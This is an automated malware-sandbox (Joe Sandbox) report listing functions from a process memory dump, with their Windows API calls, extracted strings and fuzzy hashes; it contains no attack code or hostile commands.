                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: ObjectSingleWait
                                      • String ID: wil
                                      • API String ID: 24740636-1589926490
                                      • Opcode ID: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
                                      • Instruction ID: 03437a66a8acd2bce4762e13df1192df704aa7fc8dad580e00d8969e96cbdbdc
                                      • Opcode Fuzzy Hash: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
                                      • Instruction Fuzzy Hash: E74165A7A0854383F3606B19E600279E6A1EF85F89FDCB131D92A866D4DF3DD4858721
                                      Function 00007FF755CA7AA0 Relevance: 15.2, APIs: 10, Instructions: 221COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: CreateDirectoryDriveFullNamePathTypememset
                                      • String ID:
                                      • API String ID: 1397130798-0
                                      • Opcode ID: 1e06caf0b77d17d600aef2fcb22a4425febc896dd4a75ac9af5e73f825b2a127
                                      • Instruction ID: bdde95152f835d40aaff380730d1de1142978b60f73817196d03b702b7c1d0d1
                                      • Opcode Fuzzy Hash: 1e06caf0b77d17d600aef2fcb22a4425febc896dd4a75ac9af5e73f825b2a127
                                      • Instruction Fuzzy Hash: 5091A6ABA0878386EB65AB11D8402B9F7E1FB44F98FC88135D94D47B94DF3DD9408320
                                      Function 00007FF755CB7E80 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 210COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00007FF755CAD3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF755CAD46E
                                        • Part of subcall function 00007FF755CAD3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF755CAD485
                                        • Part of subcall function 00007FF755CAD3F0: wcschr.MSVCRT ref: 00007FF755CAD4EE
                                        • Part of subcall function 00007FF755CAD3F0: iswspace.MSVCRT ref: 00007FF755CAD54D
                                        • Part of subcall function 00007FF755CAD3F0: wcschr.MSVCRT ref: 00007FF755CAD569
                                        • Part of subcall function 00007FF755CAD3F0: wcschr.MSVCRT ref: 00007FF755CAD58C
                                      • iswspace.MSVCRT ref: 00007FF755CB7EEE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: wcschr$Heapiswspace$AllocProcess
                                      • String ID: A
                                      • API String ID: 3731854180-3554254475
                                      • Opcode ID: 41f65c48cf3e37159ed1ee97e5992bf17c61e45d372bd9afbfce449b4f210755
                                      • Instruction ID: 3c216d41d7fc8304a0a2ba7fe591fadd040aa1ba45b88cfcb13da35294e04138
                                      • Opcode Fuzzy Hash: 41f65c48cf3e37159ed1ee97e5992bf17c61e45d372bd9afbfce449b4f210755
                                      • Instruction Fuzzy Hash: C0A17FAB90968385E660AB11A45027DF7A0FF45F98FC89138DA5D47794EF3CE442DB20
                                      Function 00007FF755CC9B0C Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 261registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Enum$Openwcsrchr
                                      • String ID: %s=%s$.$\Shell\Open\Command
                                      • API String ID: 3402383852-1459555574
                                      • Opcode ID: c43f82accf2197ad62986fa4fadf1decf1ac45d35886ea9e70cf93cd770afeea
                                      • Instruction ID: ea3943154b1f4061677e91a45b9d681a8c1871d91234b66dd6c3d4c912772969
                                      • Opcode Fuzzy Hash: c43f82accf2197ad62986fa4fadf1decf1ac45d35886ea9e70cf93cd770afeea
                                      • Instruction Fuzzy Hash: 74A1B4ABA0868382EE10AB55D0502B9E2A0FF85F98FC85535DA5E4B7C5DF7CF941C320
                                      Function 00007FF755CB7610 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 228COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: memset$wcscmp
                                      • String ID: %s
                                      • API String ID: 243296809-3043279178
                                      • Opcode ID: b0ad3edef7fc64e03d81687a8a254aeebb6f4c69458638a3e2c38bf1209308ef
                                      • Instruction ID: 0d093746e14a501871b5a1a3b64ad7042bc1de33aa71188688b6f12e9c87786d
                                      • Opcode Fuzzy Hash: b0ad3edef7fc64e03d81687a8a254aeebb6f4c69458638a3e2c38bf1209308ef
                                      • Instruction Fuzzy Hash: 08A192AB70968786EB62EB21D8403F9A3A0FB48B5CFD84135CE4D47695DF3CEA448310
                                      Function 00007FF755CA99F0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 146COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00007FF755CACD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF755CAB9A1,?,?,?,?,00007FF755CAD81A), ref: 00007FF755CACDA6
                                        • Part of subcall function 00007FF755CACD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF755CAB9A1,?,?,?,?,00007FF755CAD81A), ref: 00007FF755CACDBD
                                      • wcschr.MSVCRT(?,?,?,00007FF755CA99DD), ref: 00007FF755CA9A39
                                        • Part of subcall function 00007FF755CADF60: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,00000000,00007FF755CACEAA), ref: 00007FF755CADFB8
                                        • Part of subcall function 00007FF755CADF60: RtlFreeHeap.NTDLL ref: 00007FF755CADFCC
                                        • Part of subcall function 00007FF755CADF60: _setjmp.MSVCRT ref: 00007FF755CAE03E
                                      • wcschr.MSVCRT(?,?,?,00007FF755CA99DD), ref: 00007FF755CA9AF0
                                      • wcschr.MSVCRT(?,?,?,00007FF755CA99DD), ref: 00007FF755CA9B0F
                                        • Part of subcall function 00007FF755CA96E8: memset.MSVCRT ref: 00007FF755CA97B2
                                        • Part of subcall function 00007FF755CA96E8: ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF755CA9880
                                      • _wcsupr.MSVCRT ref: 00007FF755CBB844
                                      • wcscmp.MSVCRT ref: 00007FF755CBB86D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Heap$wcschr$Process$AllocFree_setjmp_wcsuprmemsetwcscmp
                                      • String ID: FOR$ IF
                                      • API String ID: 3663254013-2924197646
                                      • Opcode ID: f7cff311b475cb809cbefbcbc2ea312c8d083385a1c2e3cb15cb3788630bb160
                                      • Instruction ID: e1cee137eed4047d90fbb1acd914be3481e3e3adb89e0333467bd2b6e8c93142
                                      • Opcode Fuzzy Hash: f7cff311b475cb809cbefbcbc2ea312c8d083385a1c2e3cb15cb3788630bb160
                                      • Instruction Fuzzy Hash: 1351C3AAF0964382FE55BB15D41117DAAA1AF84FACFCC8635D91E4B7D5DE3CE8018320
                                      Function 00007FF755CCBA40 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 103COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: ErrorLast$InformationVolumeiswalphatowupper
                                      • String ID: %04X-%04X$:
                                      • API String ID: 930873262-1938371929
                                      • Opcode ID: 1b48387342add1d7daed67bb80fe16c2eacc5f7ab2e1033d601e8994222be5e6
                                      • Instruction ID: 8823e4d852b7f9c629d29d546a1c7fd6e4550f40bd673be64cd8a9642139b146
                                      • Opcode Fuzzy Hash: 1b48387342add1d7daed67bb80fe16c2eacc5f7ab2e1033d601e8994222be5e6
                                      • Instruction Fuzzy Hash: C44192BBA08A8382EB60AB50E4502BAE7A0FB84F5CFC85135D95D436C5DF7CD545C720
                                      Function 00007FF755CB36EC Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 93fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: FileWrite$ByteCharMultiWide$_get_osfhandle
                                      • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
                                      • API String ID: 3249344982-2616576482
                                      • Opcode ID: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
                                      • Instruction ID: 8ca40c52e5d191975eaa800fa16968c0116b32e12cfb034c79e7224a5e994b5d
                                      • Opcode Fuzzy Hash: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
                                      • Instruction Fuzzy Hash: 46417FB7A18B8286E7109F12A84476AFBA4FB89FD8F884234DA4D57794CF3CD455CB10
                                      Function 00007FF755CB6A28 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 80COMMON
                                      Download Yara Rule
                                      APIs
                                      • iswdigit.MSVCRT(?,?,00000000,00007FF755CB68A3,?,?,?,?,?,?,?,00000000,?,00007FF755CB63F3), ref: 00007FF755CB6A73
                                      • wcschr.MSVCRT(?,?,00000000,00007FF755CB68A3,?,?,?,?,?,?,?,00000000,?,00007FF755CB63F3), ref: 00007FF755CB6A91
                                      • wcschr.MSVCRT(?,?,00000000,00007FF755CB68A3,?,?,?,?,?,?,?,00000000,?,00007FF755CB63F3), ref: 00007FF755CB6AB0
                                      • wcschr.MSVCRT(?,?,00000000,00007FF755CB68A3,?,?,?,?,?,?,?,00000000,?,00007FF755CB63F3), ref: 00007FF755CB6AE3
                                      • wcschr.MSVCRT(?,?,00000000,00007FF755CB68A3,?,?,?,?,?,?,?,00000000,?,00007FF755CB63F3), ref: 00007FF755CB6B01
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: wcschr$iswdigit
                                      • String ID: +-~!$<>+-*/%()|^&=,
                                      • API String ID: 2770779731-632268628
                                      • Opcode ID: 04afb1219d2367be7b294e05ecf67b56e7fd74584ee28e872d0024d55c3108eb
                                      • Instruction ID: 22bcf26c5ea5e2eb50abee0d847a8cca5cd59b831de802f88fd03dda360e83e1
                                      • Opcode Fuzzy Hash: 04afb1219d2367be7b294e05ecf67b56e7fd74584ee28e872d0024d55c3108eb
                                      • Instruction Fuzzy Hash: F8315DA7609A9785EB50AF01E450278B7F0FB89F99BD98135DA8E43354EF7CE844D320
                                      Function 00007FF755CB1630 Relevance: 10.7, APIs: 7, Instructions: 208memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,00000000,?,00007FF755CB14D6,?,?,?,00007FF755CAAA22,?,?,?,00007FF755CA847E), ref: 00007FF755CB1673
                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF755CB14D6,?,?,?,00007FF755CAAA22,?,?,?,00007FF755CA847E), ref: 00007FF755CB168D
                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF755CB14D6,?,?,?,00007FF755CAAA22,?,?,?,00007FF755CA847E), ref: 00007FF755CB1757
                                      • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF755CB14D6,?,?,?,00007FF755CAAA22,?,?,?,00007FF755CA847E), ref: 00007FF755CB176E
                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF755CB14D6,?,?,?,00007FF755CAAA22,?,?,?,00007FF755CA847E), ref: 00007FF755CB1788
                                      • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF755CB14D6,?,?,?,00007FF755CAAA22,?,?,?,00007FF755CA847E), ref: 00007FF755CB179C
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Heap$Process$Alloc$Size
                                      • String ID:
                                      • API String ID: 3586862581-0
                                      • Opcode ID: de24f60fade2ea1a8e9170476ea6e59d916578871a0233016ef2ac0a8793df42
                                      • Instruction ID: 9ec7009563c03dcca7ed8337ac911dc9e0d57b060b29ad4e3f1dea1665a70f92
                                      • Opcode Fuzzy Hash: de24f60fade2ea1a8e9170476ea6e59d916578871a0233016ef2ac0a8793df42
                                      • Instruction Fuzzy Hash: BD9159BBA09A4381EB51AB15E450379B6A0FB45FA8FDD8135CA5D477A0DF7CE881C320
                                      Function 00007FF755CB86F0 Relevance: 10.7, APIs: 7, Instructions: 154COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: ConsoleErrorOpenTitleTokenwcsstr$CloseFormatFreeLastLocalMessageProcessStatusThread
                                      • String ID:
                                      • API String ID: 1313749407-0
                                      • Opcode ID: ee6218c461c646e929341b9db92bfc99d61f95d83b881389c5cff3e0ca217c2e
                                      • Instruction ID: 7ea52fa7f0625041a85fb23977ccf0d6cdf5a4c55a4f785003d734fcab4753dd
                                      • Opcode Fuzzy Hash: ee6218c461c646e929341b9db92bfc99d61f95d83b881389c5cff3e0ca217c2e
                                      • Instruction Fuzzy Hash: B251B5ABA0868382EA50BB119818179E695BF45FACFCC5234DD1E677D1EF3CE840C660
                                      Function 00007FF755CAF5D7 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 91COMMON
                                      Download Yara Rule
                                      APIs
                                      • iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF755CAE626,?,?,00000000,00007FF755CB1F69), ref: 00007FF755CAF1BA
                                      • wcschr.MSVCRT(?,?,00000000,00007FF755CB1F69,?,?,?,?,?,?,?,00007FF755CA286E,00000000,00000000,00000000,00000000), ref: 00007FF755CAF1E7
                                      • iswdigit.MSVCRT(00000000,00000000,?,00000000,?,00007FF755CAE626,?,?,00000000,00007FF755CB1F69), ref: 00007FF755CAF1FF
                                      • iswdigit.MSVCRT(?,?,00000000,00007FF755CB1F69,?,?,?,?,?,?,?,00007FF755CA286E,00000000,00000000,00000000,00000000), ref: 00007FF755CAF2BB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: iswdigit$iswspacewcschr
                                      • String ID: )$=,;
                                      • API String ID: 1959970872-2167043656
                                      • Opcode ID: e8a5d63c360e4c13ef561f3ce3dd80187a3c2d8689f5c743dd181e811bfffbc3
                                      • Instruction ID: e1f9c827f8a112cca08e426da3a3489fa8f15a101ffb649dd37444dadb0682c2
                                      • Opcode Fuzzy Hash: e8a5d63c360e4c13ef561f3ce3dd80187a3c2d8689f5c743dd181e811bfffbc3
                                      • Instruction Fuzzy Hash: D0417CEFE0825786FBA47B14E554279BEA0AF10F4DFDC5836CA8D421A0DF3CA4418B60
                                      Function 00007FF755CCBE30 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 60COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: _wcsicmpwcschr$Heap$AllocProcessiswspace
                                      • String ID: KEYS$LIST$OFF
                                      • API String ID: 411561164-4129271751
                                      • Opcode ID: 9fd236f794765471c688532a78fffa23d2b2533206d05d2e386dcf7da8b9c818
                                      • Instruction ID: 9ef030d8d5e329570567e03cb8fed89315c2725405dca1fab01f63838a00a5db
                                      • Opcode Fuzzy Hash: 9fd236f794765471c688532a78fffa23d2b2533206d05d2e386dcf7da8b9c818
                                      • Instruction Fuzzy Hash: B921A5BFA0864392F754BB65E450075E7A1EF45F5CFC8A235C62E862E4EE7C94848220
                                      Function 00007FF755CAE260 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 128COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
